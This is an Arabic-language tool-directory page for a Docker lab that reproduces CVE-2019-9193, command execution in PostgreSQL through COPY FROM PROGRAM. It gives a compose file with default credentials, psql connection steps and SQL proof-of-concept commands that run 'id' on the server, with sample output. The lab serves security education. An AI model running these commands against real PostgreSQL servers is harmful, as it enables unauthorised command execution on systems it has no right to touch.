Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

مختبر قائم على Docker يوضح CVE-2019-9193 تنفيذ أوامر عشوائية في PostgreSQL عبر COPY FROM PROGRAM، مع PoC خطوة بخطوة للاختبار الأمني والتعليم.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9193byVulHub


تنفيذ أوامر عشوائية في PostgreSQL بامتيازات المسؤول (CVE-2019-9193)

الوصف

PostgreSQL هو نظام إدارة قواعد بيانات علائقية مفتوح المصدر وقوي. ثغرة أمنية موجودة في الإصدارات من 9.3 إلى 11 تسمح للمسؤولين أو المستخدمين الذين لديهم امتيازات COPY TO/FROM PROGRAM بتنفيذ أوامر عشوائية على النظام.

المراجع:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

إعداد البيئة

ملف Docker Compose ()

docker-compose.yml

أنشئ ملف docker-compose.yml بالمحتوى التالي:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

تشغيل حاوية PostgreSQL

قم بتشغيل الحاوية بالأمر التالي:

root@kitploit:~
docker compose up -d

تحقق من أن الحاوية تعمل:

root@kitploit:~
docker ps

يجب أن يظهر الإخراج حاوية PostgreSQL تستمع على المنفذ 5432.


تنفيذ الاستغلال دون الدخول إلى الحاوية

1. تثبيت عميل PostgreSQL

إذا لم يكن لديك عميل psql مثبتًا، يمكنك تثبيته باستخدام:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. الاتصال بقاعدة البيانات من سطر الأوامر

اتصل بقاعدة البيانات مباشرة من كالي:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

سيُطلب منك كلمة المرور، أدخل:

root@kitploit:~
postgres

3. تنفيذ الإثبات (Proof of Concept)

بمجرد الاتصال بوحدة تحكم PostgreSQL، نفذ الأوامر التالية لاستغلال الثغرة:

root@kitploit:~
-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. تنفيذ الأمر من سطر الأوامر (بدون قشرة تفاعلية)

يمكنك تنفيذ كل شيء مباشرة من سطر الأوامر:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

التحقق من الإخراج

إذا نجح الاستغلال، يجب أن ترى إخراجًا مشابهًا:

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

الخروج من وحدة تحكم PostgreSQL

اضغط \q للخروج:

root@kitploit:~
\q

ملاحظات أمنية

تسمح هذه الثغرة بتنفيذ أوامر عشوائية بامتيازات إدارية. استخدمها فقط في بيئات خاضعة للرقابة ولأغراض الدراسة أو التحقق. استغلال هذه الثغرة على أنظمة غير مصرح بها غير قانوني.

تنزيل الأداة